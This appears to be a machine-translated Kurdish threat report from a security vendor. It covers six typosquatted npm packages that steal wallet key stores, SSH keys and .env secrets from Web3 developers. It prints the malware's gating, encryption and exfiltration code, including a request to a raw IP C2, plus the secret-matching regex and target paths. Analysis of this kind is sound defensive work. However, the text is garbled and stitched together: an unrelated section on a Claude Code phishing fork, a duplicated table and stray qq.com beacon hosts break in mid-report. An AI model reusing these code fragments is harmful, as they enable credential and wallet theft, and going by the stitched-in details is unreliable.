Êrîşa EVMDeFi npm Typosquatting Mifteyên Pêşdebiran Didize

Êrîşa EVM/DeFi npm Typosquatting Mifteyên Pêşdebiran Didize

TL; DR

Di 6ê Gulana 2026an de, yek weşangerê npm, namikazesarada010206, şeş pakêtên zirardar şandin ku ekosîstema pêşdebirên Ethereum, Solidity, û DeFi hedef digirin.

Pakêtan, viem-core, viem-utils-core, hardhat-core-utils, evm-utils, foundry-utils, û web3-utils-core, navên maqûl bi kar anîn ku wekî pirtûkxaneyên alîkar ji bo amûrên populer ên Web3 xuya dikirin.

Her şeş pakêtan heman tişt dihewîne telemetry.js pel. Pelê li seranserê klusterê bi baytê wekhev bû, bi SHA-256:

SHA-256 71426e93cb6143052d5aeeca920850f8a0343c95bc65aab9a15145848cc5bff1

Malware di dema sazkirinê de kar nake. Tune ye preinstall or postinstall çengelê. Di şûna wê de, dema ku pakêt bi rêya tê hinartin çalak dibe require().

Ew hûrgilî girîng e.

Împlant li bendê dimîne heta ku pêşdebir bi rastî pakêtê bikar bîne. Dûv re ew kontrol dike ka stasyona kar dişibihe jîngehek pêşveçûnê ya Ethereum / Solidity ya rastîn. Ew li mifteyên Alchemy an Infura, mifteyên taybet, mnemonics, mifteyên bicîhker, an peldankek Foundry ya herêmî digere.

Eger mêvandar li hev bike, diz mifteyên taybet ên SSH, depoyên mifteyên berîka Foundry / Geth / Brownie berhev dike, .env* pelan, û guhêrbarên hawîrdora hesas. Ew pakêtê bi AES-256-GCM şîfre dike û bi karanîna şîfreyek hişk-kodkirî wê dişîne xalek dawî ya IPv4 C2 ya xav bi verastkirina TLS-ê ya neçalak.

Sîstema Hişyariya Zû ya Malware (MEW) ya Xygeni her şeş pakêt wekî zirardar piştrast kir. Pakêta rapora rakirina qeyda npm li benda wergirtinê ye.

Kom: Şeş Pakêt, Yek Weşanxane

Hesabê weşanger namikazesarada010206 bi navnîşana Gmail a nehatî verastkirin ve girêdayî bû namikazesarada010206@gmail.com.

Kampanya di 6ê Gulana 2026an de wekî weşaneke rojane derket holê. Her şeş pakêt wekî guhertoyên wan hatin çêkirin. 1.0.0, ti girêdayîbûna dema xebitandinê tunebû, û tenê sê pel şandin:

package.json index.js telemetry.js

Wan heman depoya çavkaniyê jî ragihand:

https://github.com/harunosakura030303-maker/evmchain-config

Sê pakêtên pêşîn di weşana yekem de ji hêla skenerên MEW ve hatin dîtin. Sê pakêtên mayî piştî nirxandina analîstan a profîla npm ya weşanger bi zorê hatin nîşankirin. Carekê heman byte-yeksan telemetry.js li seranserê komê hate piştrast kirin, ew bi domdarî wekî zirardar hatin girtin.

Pakêt Awa npm Hatiye Weşandin Bilêta MEW Hûkûm
viem-core 1.0.0 2026-05-06 01:38:44Z #51049 Malav
viem-utils-core 1.0.0 2026-05-06 #51050 Malav
amûrên-core-hardhat 1.0.0 2026-05-06 #51051 Malav
evm-utils 1.0.0 2026-05-06 #51069 Xerabkar, bi domdarî
amûrên şûştinê 1.0.0 2026-05-06 #51071 Xerabkar, bi domdarî
web3-utils-core 1.0.0 2026-05-06 #51070 Xerabkar, bi domdarî

Stratejiya navlêkirinê rasterast lê bi bandor e.

Ev pakêt navên rastîn ên jorîn teqlîd nakin. Di şûna wê de, ew paşgirên "bikêrhatî" yên maqûl bikar tînin wekî -core, -utils, û -utils-coreEv yek wan dişibîne pirtûkxaneyên hevalbend ku pêşdebir dibe ku li bendê be ku nêzîkî amûrên Web3 bibîne.

Pakêta Xerabkar Armanceke Rewa
viem-core viem, xerîdarek populer a Ethereum TypeScript
viem-utils-core viem
amûrên-core-hardhat hardhat, hawîrdorek pêşveçûna Solidity ya sereke
evm-utils Navdêrgeha amûrên EVM-ê yên gelemperî
amûrên şûştinê kargeha şûştinê, zincîreke amûrên Solidity
web3-utils-core web3-utils, alîkarên Web3.js

Ev qalibê "pakêta pêvek" e: ne "Ez pakêta rastîn im," lê "Ez di dora pakêta rastîn de wekî alîkarekî maqûl xuya dikim."

Ji bo pêşdebirên DeFi yên ku bi lez tevdigerin, ev ji bo afirandina xetereyê bes e.

Dema ku pakêt tê îtxalkirin çi dibe

Zincîra êrîşê piçûk, bi zanebûn e, û li ser jîngehên pêşxistina krîptoyê disekine.

Çengek sazkirinê tune. Di şûna wê de, her pakêtek tê de heye index.js ku fonksiyona stubê hinarde dike û dûv re modula telemetrîyê ya zirardar bar dike.

require('./telemetry').init();

Ev tê vê wateyê ku malware di importkirina yekem de çalak dibe.

Ev ji bo êrîşkar ji hêla operasyonel ve bikêrhatî ye. Gelek skaner û sandbox li ser tevgera dema sazkirinê disekinin. Ev pakêt li bendê ye heta ku bi rastî ji hêla pêşdebir, skrîpta avakirinê, koma ceribandinê, an rêya dema xebitandinê ve were bikar anîn.

Deriyê Çalakkirinê: Tenê li ser Îstasyonên Kar ên Pêşdebirên Web3 yên Rastîn Bixebite

Beşa herî girîng a implantê deriyê çalakkirinê ye.

Malware guherbarên jîngehê yên ku bi gelemperî li ser makîneyên pêşdebirên Ethereum / Solidity têne dîtin kontrol dike:

const indicators = [   process.env.ALCHEMY_API_KEY,   process.env.INFURA_KEY,   process.env.PRIVATE_KEY,   process.env.MNEMONIC,   process.env.DEPLOYER_KEY, ].filter(Boolean);

Ew her weha kontrol dike ka Foundry xuya dike ku hatiye sazkirin:

fs.existsSync(path.join(os.homedir(), '.foundry'))

Eger yek ji şertan jî rast nebe, fonksiyon vedigere û tiştekî nake.

Ev yek pakêtê di hawîrdorên analîzên gelemperî de bêdengtir dike. Qutîkek bê mifteyên Foundry, Alchemy, mifteyên Infura, mifteyên taybet, an mnemonics dibe ku bandorek bêzerar bibîne.

Li ser hosteke hevber, malware berî berhevkirinê 60 heta 90 saniye li bendê dimîne:

setTimeout(() => { try { _collect(); } catch {} },           60000 + Math.random() * 30000).unref();

Ev derengketin têkiliya eşkere ya di navbera hawirdekirin û derxistinê de kêm dike. .unref() bang di heman demê de dihêle ku pêvajoya mêvandar bi awayekî normal derkeve ger pakêt di skrîptek kurt-temen de hatibe import kirin.

Ev ne tevgereke bi deng û qîmet a "şikandin û girtin" e. Ew diziyeke hedefgirtî ye ku ji bo dûrketina ji xebitandinê hatiye çêkirin, heya ku jîngeha pêşdebiran ne hêjayî dizînê be.

Tiştên ku Diz Berhev Dike

Dema ku deriyê aktîvkirinê derbas dibe, malware ji çavkaniyên ku di pêşveçûna Web3-ê de herî girîng in berhev dike: mifteyên taybet, depoyên mifteyên berîkan, bawernameyên bicihkirinê, razên ewr, nîşanekanên npm, û veavakirina projeya herêmî.

Kanî Çi tê berhevkirin
pêvajo.env Her guhêrbarek ku li gorî /TOKEN|SECRET|KEY|PASS|AUTH|PRIVATE|SEED|MNEMONIC|AWS|NPM|DEPLOY/i ye
~/.ssh/* Pelên ku PRIVATE KEY an BEGIN OPENSSH dihewînin, tevî naveroka tevahî ya pelê
~/.foundry/kilîtfiroşgeh/* Pelên depoya mifteyê ya berîka Foundry
~/.ethereum/kilîstore/* Pelên depoya mifteyê ya berîka Geth
~/.brownie/hesab/* Pelên depoya mifteyê ya berîka Brownie
${cwd}/.env Naveroka tevahî ya pelê
${cwd}/.env.local Naveroka tevahî ya pelê
${cwd}/.env.production Naveroka tevahî ya pelê
${cwd}/.env.development Naveroka tevahî ya pelê
os.hostname() Metadataya mêvandar
crypto.randomUUID() Nasnameya qurbanî/danişînê
Dîrok.niha() Demjimêra berhevkirinê
otheve.beacon.qq.com oth.str.beacon.qq.com h.trace.qq.com

Nîşaneyên ATTA ev in:

ATTA_ID 00400014144 ATTA_TOKEN 6478159937

Em nekarîn piştrast bikin ka telemetrî analîtîkên operator bi xwe ne an kanalek cuda ya pere-kirî ye. Tokenên ATTA di her du nimûneyên ku me lêkolîn kirine de yek in.

Koma B: heibai

claude.hk OAuth Phishing + ANTHROPIC_BASE_URL Hijack

Nimûneya 1ê Nîsanê baskê herî xav û berê yê kampanyayê ye.

heibai:2.1.88-claude.hk-4 ji hêla hate weşandin wuguoqiangvip28, hesabek ku di 7ê Hezîrana 2025an de hatiye afirandin. Pakêt bi eşkereyî xwe li dijî ya rewa guherto kir. 2.1.88 Berdana Antropîk.

Ew bi CA-certificate MITM re eleqedar nabe. Di şûna wê de, ew li ser xala dawî ya OAuth derewan li bikarhêner dike.

Lêzêdekirinên xerabkar ên li ser çavkaniya Claude Code ya derketî ev in:

Kanî Çi tê berhevkirin
pêvajo.env Her guhêrbarek ku li gorî /TOKEN|SECRET|KEY|PASS|AUTH|PRIVATE|SEED|MNEMONIC|AWS|NPM|DEPLOY/i ye
~/.ssh/* Pelên ku PRIVATE KEY an BEGIN OPENSSH dihewînin, tevî naveroka tevahî ya pelê
~/.foundry/kilîtfiroşgeh/* Pelên depoya mifteyê ya berîka Foundry
~/.ethereum/kilîstore/* Pelên depoya mifteyê ya berîka Geth
~/.brownie/hesab/* Pelên depoya mifteyê ya berîka Brownie
${cwd}/.env Naveroka tevahî ya pelê
${cwd}/.env.local Naveroka tevahî ya pelê
${cwd}/.env.production Naveroka tevahî ya pelê
${cwd}/.env.development Naveroka tevahî ya pelê
os.hostname() Metadataya mêvandar
crypto.randomUUID() Nasnameya qurbanî/danişînê
Dîrok.niha() Demjimêra berhevkirinê

Lîsteya hedefan pir taybet e. Ev ne diziya gerokên gelemperî ye an jî berhevkirina bawernameyên berfireh e. Ew ji bo pêşdebirên ku sepanên Ethereum ava dikin, diceribînin, bicîh dikin, an jî dixebitînin e.

Têxistina depoyên mifteyên Foundry, Geth, û Brownie bi taybetî girîng e. Ev pel dikarin gihîştina rasterast a berîkan an nasnameyên bicihkirinê temsîl bikin. Ger êrîşkar bikaribe wan bi şîfreyan, mnemonîk, an razên jîngehê ve girêbide, dibe ku ew bikaribin fonan veguhezînin, xwe wekî bicihker nîşan bidin, an jî operasyonên peymanên jîr bixin xeterê.

Şîfrekirin Berî Derxistinê

Malware daneyên berhevkirî berî şandina wan şîfre dike.

const key = crypto.createHash('sha256').update(K).digest(); const iv = crypto.randomBytes(12); const cipher = crypto.createCipheriv('aes-256-gcm', key, iv);

Şîfreya kodkirî ya hişk ev e:

a]3Fk9$mP2xL7vQ8nR4wJ6yB0tH5cE1d

Barkêşiya dawî wekî JSON tê pêçandin:

{"v":2,"iv":"<base64>","d":"<base64-ciphertext>","t":"<base64-gcm-tag>"}

Şîfrekirin bi tena serê xwe malware pêşketîtir nake. Lêbelê, ew vekolîna torê dijwartir dike. Parêzerek ku li derketinê dinêre dê barkêşek JSON bibîne, lê mifteyên dizî, pelên berîkan, an jî... .env naverok bêyî şîfreya hişk-kodkirî û mantiqa şîfrekirinê.

Derxistina bo IPv4 C2-ya Raw

Riya derxistinê bi kodeke hişk hatiye amadekirin:

const req = https.request({   hostname: '76.13.37.80', port: 8443,   path: '/api/v1/telemetry', method: 'POST',   headers: { 'Content-Type': 'application/json', ... },   rejectUnauthorized: false, timeout: 8000, }, () => {});

Malware daneyan dişîne bo:

https://76.13.37.80:8443/api/v1/telemetry

Du hûrgulî diyar dibin.

Pêşî, C2 navnîşaneke IPv4 ya xav e ne domainek e. Ev yek pêwîstiya qeydkirina domainê ji holê radike û hin tespîtên li ser bingeha domainê asteng dike.

Duyemîn, verastkirina TLS bi van tiştan neçalak e:

rejectUnauthorized: false

Ev yek dihêle ku malware her sertîfîkayekê, tevî sertîfîkayên xwe-îmzekirî jî, qebûl bike. Bi gotineke din, êrîşkar bêyî ku hewcedariya wî bi sertîfîkayek giştî ya derbasdar hebe, veguhastina şîfrekirî distîne.

Mantîqa ji nû ve ceribandinê û hosteke paşveger tune. Çewtî bi bêdengî têne daqurtandin. Ev pakêtê bêdeng dihêle heke C2 negirêdayî be an jî negihîştî be.

Çima Ev Kampanya Girîng e

Piraniya pakêtên npm yên xerabkar ên ku ji bo pêşdebiran hatine çêkirin, li pey bawernameyên berfireh in: nîşaneyên npm, mifteyên AWS, nîşaneyên GitHub, an .npmrc Pelan

Ev kampanya hedefê teng dike.

Ew li nîşanên ku makîne aîdî pêşdebirê Ethereum an Solidity ye digere. Dûv re ew tam wan hebûnên ku di wê jîngehê de girîng in dikişîne: depoyên mifteyên berîkan, mifteyên taybet, mnemonîk, mifteyên bicîhker, .env pelan, û mifteyên SSH.

Ev yek kampanyayê ji bo tîmên Web3 ji dizek npm-ê ya gelemperî xeternaktir dike.

Infeksiyonek serketî dikare eşkere bike:

  • Berîkên bicihkirinê
  • Bişkojkên rêveberiya peymana jîr
  • Kilîtên dabînkerê RPC
  • Pêzanînên bicihkirina ewr
  • nîşaneyên weşanê yên npm
  • Gihîştina SSH bo pêşdebir an avakirina binesaziyê
  • Nehêniyên projeyê ku tê de hatine tomarkirin .env files
  • Depoyên mifteyên berîkan ji bo Foundry, Geth, an Brownie

Navên pakêtan jî endezyariya civakî ya zelal nîşan didin. Ew bi navên amûrên naskirî ekosîstema pêşdebirên Web3 hedef digirin: viem, hardhat, foundry, evm, û web3.

Pêwîst nake aktor projeyên rastîn bixe xeterê. Tenê pêdivî bi pêşdebirekî heye ku tiştek ku dişibihe pakêtek hevalbend a maqûl saz bike.

Nîşaneyên Têkçûnê û Tesbîtkirinê

Pakêt û Weşanxane
Erd Giranî
weşanxaneya npm namikazesarada010206
E-nameya weşanger namikazesarada010206@gmail.com
E-name hate piştrast kirin Na
SCM nirxandin Na
Pûana navûdengê 1.0
pakêtên viem-core, viem-utils-core, hardhat-core-utils, evm-utils, foundry-utils, web3-utils-core
guhertoyên Hemû 1.0.0
Depoya çavkaniyê https://github.com/harunosakura030303-maker/evmchain-config
Xirabkar hatiye piştrastkirin Her şeş pakêt
Têkelî
Awa Giranî
Xala dawî ya C2 https://76.13.37.80:8443/api/v1/telemetry
C2 IP 76.13.37.80
Porta C2 8443/tcp
Reftara TLS redkirinBêdestûr: derewîn
Şêma bargiraniyê {"v":2,"iv": "d": "t": }
Pel û Haş
Awa Giranî
telemetry.js SHA-256 71426e93cb6143052d5aeeca920850f8a0343c95bc65aab9a15145848cc5bff1
Şêweya pakêtê pakêt.json, îndeks.js, telemetry.js
Hejmara pelan 3
Mezinahiya giştî ya texmînî 3.4 KB

Sînyalên Aktîvkirinê

Malware van guherbarên jîngehê kontrol dike:

ALCHEMY_API_KEY INFURA_KEY PRIVATE_KEY MNEMONIC DEPLOYER_KEY

Ew her weha kontrol dike ji bo:

~/.foundry/

Rêyên Mêvandar ên Armanckirî

~/.ssh/* ~/.foundry/keystores/* ~/.ethereum/keystore/* ~/.brownie/accounts/* ${cwd}/.env ${cwd}/.env.local ${cwd}/.env.production ${cwd}/.env.development

Koleksiyona Regex

/TOKEN|SECRET|KEY|PASS|AUTH|PRIVATE|SEED|MNEMONIC|AWS|NPM|DEPLOY/i

Nîşeyên Tesbîtkirinê

Çend rêzik vê kampanyayê bêyî hewcedariya analîzek tevgerî ya tevahî digirin.

Pêşî, lockfiles ji bo şeş navên pakêtên zirardar bişopîne:

viem-core viem-utils-core hardhat-core-utils evm-utils foundry-utils web3-utils-core

Her maçek di package-lock.json, yarn.lock, pnpm-lock.yaml, an node_modules Divê dîrok wekî bûyerek girîng were nirxandin.

Ya duyemîn, pêvajoyên Node.js ên ku rêyên depoya mifteyê ya berîkan dixwînin bişopînin:

~/.foundry/keystores/ ~/.ethereum/keystore/ ~/.brownie/accounts/

Ev ji bo pakêtek ku wekî girêdayîbûnek alîkar tê hinartin kêm caran tevgereke rewa ye. Bi taybetî dema ku çalakiya tora derketî tê şopandin, gumanbar e.

Ya sêyemîn, girêdanên HTTPS-ê asteng bikin an jî hişyar bikin ji bo:

76.13.37.80:8443

Bi taybetî jî dema ku rêya daxwazê ​​ev e:

/api/v1/telemetry

Çaremîn, li pakêtên npm-ê bigerin ku van taybetmendiyan li hev dicivînin:

  • Weşangerê nû an jî bi navûdengek kêm
  • Hesabê Gmailê yê nehatî verastkirin
  • Navê pakêta Web3-yê ya li kêleka
  • Dîroka depoya watedar tune ye
  • Şêweya pakêta piçûk
  • index.js ku pelê telemetrî an alîkar bar dike
  • Girêdayîbûnên di dema xebitandinê de tune ne
  • Berhevkirina guhêrbar-hawîrdorê ya hesas
  • Gihîştina depoya mifteyê ya Wallet

Ev şablon ji IOC-yek yekane bikêrtir e ji ber ku pakêta din dibe ku navnîşana IP-ê biguherîne lê heman mantiqa armancgirtinê biparêze.

Lîsteya Kontrolê ya Bersiva Lihevkirinê

Eger pêşdebirekî yek ji şeş pakêtan bi kar anîbe û jîngeha wan bi deriyê aktîvkirinê re li hev bike, stasyona xebatê wekî xeternak bihesibîne.

Ev yek makîneyên ku Foundry-yê sazkirî, mifteyên Alchemy an Infura di jîngehê de, mifteyên taybet, mnemonîk, an mifteyên bicihkerê tê de hene.

Bersiva pêşniyarkirî:

  • Mêvandar ji torê veqetîne.
  • Biparêze node_modules, pelên kilîtkirî, dîroka qalikê, û tomarên têkildar ji bo lêkolînên dadwerî.
  • Her cotek mifteya SSH-ê li jêr bizivirîne ~/.ssh/.
  • Ji bo her depoya mifteyan a li jêr mifteyên berîkan bizivirîne ~/.foundry, ~/.ethereum, û ~/.brownie.
  • Pereyan veguhezînin berîkên nû.
  • Her razên ku tê de hatine hilanîn bizivirînin .env* pelên di depoyên ku pêşdebir tê de xebitî de.
  • Nehêniyên jîngehê yên ku bi regexa berhevokê re li hev dikin bizivirînin, di nav de mifteyên AWS, nîşanên npm, nîşanên bicihkirinê, mifteyên API, mifteyên taybet, tov û mnemonîk.
  • Ewrê venêrînê, npm, GitHub, dabînkerê RPC, û çalakiya zincîra blokê ji dema sazkirina pakêtê ve.
  • Berî ku ji nû ve were bikaranîn, wêneyê stasyona kar ji nû ve çêbikin.

Tiştên ku Divê Parêzer Bibin

Ev kampanya nîşan dide ka çawa npm typosquatting li dora ekosîstemên pêşdebirên nirxbilind pêş dikeve.

Pêwîstiya lîstikvan bi berdewamiyê tunebû. Pêwîstiya wan bi şaşkirinê tunebû. Heta pêwîstiya wan bi pêkanîna di dema sazkirinê de jî tunebû.

Di şûna wê de, ew li ser sê tiştan pabend bûn:

  • Navên pakêtên Web3 yên pêbawer
  • Tenê li ser makîneyên rastîn ên pêşxistina krîptoyê çalakkirin
  • Dizîna rasterast a pelan û razên ku ji bo pêşdebirên Ethereumê herî girîng in

Ev yek dibe sedema ku kampanya di şopandina berfireh de bi hêsanî neyê dîtin û dema ku di hawîrdora rast de dakeve xeterdar be.

Ji bo tîmên Web3, ders zelal e: navên girêdayîbûnê wekî beşek ji modela tehdîda xwe bihesibînin. Pakêtek ku dişibihe alîkarek bêzerar hîn jî dikare bibe rêya herî kurt a ber bi xetereya berîka we ve.

Ji qeyda npm re hat ragihandin. Dema ku hesabê weşanger û pakêt werin rakirin, em ê vê postê nûve bikin.

amûrên-nermalava-berhevkirinê-ya-sca-amûran
Rîskên nermalava xwe bidin pêşanî, sererast bikin û ewle bikin
Hesabê xwe yê Belaş bistînin.
Qerta krediyê ne hewce ye.

Pêşvebirin û Radestkirina Nermalava Xwe Ewle Bike

bi Xygeni Product Suite re